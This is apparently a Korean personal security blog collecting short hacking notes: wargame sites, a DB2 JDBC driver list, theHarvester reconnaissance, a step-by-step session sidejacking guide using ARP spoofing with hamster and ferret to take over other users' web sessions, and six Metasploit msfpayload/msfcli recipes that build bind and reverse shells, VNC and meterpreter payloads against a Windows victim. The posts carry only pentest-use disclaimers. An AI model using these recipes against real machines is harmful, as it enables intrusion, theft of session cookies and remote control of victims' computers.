Kim@story

예전에 hack-me.org 라는 국내 사이트에서 문제를 몇문제 푼 기억이 난다.

거기에서 링크를 타고 들어간곳이 http://www.wechall.net <- 이곳은 많은 사이트를 제공해주며, 전체 랭킹 서비스도 해준다.

계획을 세워놓고, 하루에 한문제 정도 풀다보면, 어느새 많은 공부가 되지 않을까 생각해본다.

모의해킹이나 리버싱에 관심이 많으신 분들이 참여해보면 재미있지 않을까 생각된다.

이른바 세션 하이재킹이라고도 불리는 Sidejacking이다.

전에는 cain & abel 과 wireshark 조합으로 세션 하이재킹 테스트를 하였지만,

hamster & ferret 이라는 툴은 정말 간편하게 세션 하이재킹에 대한 테스트를 할수 있게 해준다.

사용법은 다음과 같다.

1. arp spoofing 을 통해 스니핑 환경을 만든다. <- 각자 알아서

2. 그렇게 되면          

전체 네트워크

Victim PC -------  Attacker PC --------- Internet

환경이 될 것이다.

3. ferret -W 옵션을 실행하면 인터페이스에 숫자를 부여해서 보여준다.

4. ferret -i [사용할 인터페이스]

하면 설정한 인터페이스에 대한 패킷 스니핑을 시작한다.

5. hamster.exe를 실행시킨다.

6. 웹 브라우져 창에 127.0.0.1:3128 로 프록시 설정하고, 브라우져 창에 http://hamster/ 입력

7. 그러면 창에 다른 사용자들이 웹 사이트를 접속한 쿠키 정보가 URL링크로 실시간 업데이트 된다.

8. 해당 링크를 클릭하면, Sidejacking이 성공하여, 해당 권한으로 접속 완료.



- 본 정보는 개인 정보 침해의 우려가 있기 때문에, 진단 용으로만 사용해야만 하며, 그 외의 용도로
사용하여 일어나는 법적인 책임은 당사자에게 있습니다.

DB2 진단 시 유용함.

JDBC Drvier class name
- DB2 JDBC Type 2 Driver : COM.ibm.db2.jdbc.app.DB2Driver
- DB2 JDBC Type 3 Driver : COM.ibm.db2.jdbc.net.DB2Driver
- Universal JDBC Type 2 Driver : com.ibm.db2.jcc.DB2Driver
- Universal JDBC Type 4 Driver : com.ibm.db2.jcc.DB2Driver

구글같은 검색 사이트에서 입력한 호스트와 관련된 호스트 및 이메일을 자동화검색해서 찾아주는 툴이다.

사용법

./theHarvester.py -d 진단할 사이트 -l 500 -b google

이렇게 하면 진단할 사이트에 관련해서 100개 단위씩 500개를 구글에서 검색해서 관련된 이메일 또는 호스트를 찾아준다.

이젠 정보수집도 자동화로~ㅎ

구글에서 찾은 Metasploit 의 payload 사용 예제

총 6개의 방법이 있다.

위험성이 있기 때문에 세부적인 설명은 하지 않겠다.

이 게시물에서 얻은 정보를 통한 범죄에 대한 책임은 당사자에게 있다.

취약점 또는 모의해킹 테스트 용도로만 사용하길 바란다.

Victim, Windows: 192.168.1.110
hacker, Linux: 192.168.1.112
Ports not specified in any example would default to 4444

1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:
run Listen-shell.exe

Hacker:
nc 192.168.1.110 2482

 

2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe

 

3. For a VNC listener on target

Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:
run Listen-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E

 

4. For a reverse VNC session

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:
run reverse-vnc.exe

 

5. For a meterpreter listener

create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:
run met-listen.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E

 

6. For a reverse meterpreter connection (not working yet. not sure why)

Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:
run met-reverse.exe